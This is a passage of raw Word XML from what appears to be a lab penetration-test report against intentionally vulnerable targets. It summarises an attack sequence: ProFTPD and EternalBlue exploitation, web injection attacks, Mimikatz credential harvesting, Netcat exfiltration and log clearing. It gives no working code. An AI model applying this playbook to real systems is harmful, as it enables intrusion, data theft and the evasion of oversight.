          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSH/FTP Enumeration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Version checks and potential exploits identified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Phase 3: Initial Access (Days 3–4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linux (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploited </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modcopy_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Windows 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploited </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MS17-010) via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Post-Exploitation Commands:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> System enumeration, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inspection, and network interfaces confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Phase 4: Web Exploitation (Days 5–6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> DVWA user table accessed via UNION SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XSS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework hooked browsers via injected scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Command Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS command injection exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XXE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> II XML validator leveraged for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Phase 5: Post-Exploitation (Days 7–10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Persistence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Created Linux user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Meterpreter scheduled tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>System Enumeration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> post modules to gather </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, users, and network info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Credential Harvesting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> retrieved Windows passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lateral Movement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH login to OWASP server; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanner used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Privilege Escalation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Checked SUDO permissions, SUID binaries, kernel exploits; Windows token impersonation via Incognito module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Phase 6: Data Exfiltration (Days 11–13)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Located research files using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Meterpreter search.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exfiltrated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 85MB of critical R&amp;D data via web server and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listeners.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Simulated cloud exfiltration using fake AWS credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Phase 7: Covering Tracks (Day 14)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cleared Linux history and log files; removed artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cleared Windows Event Logs with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
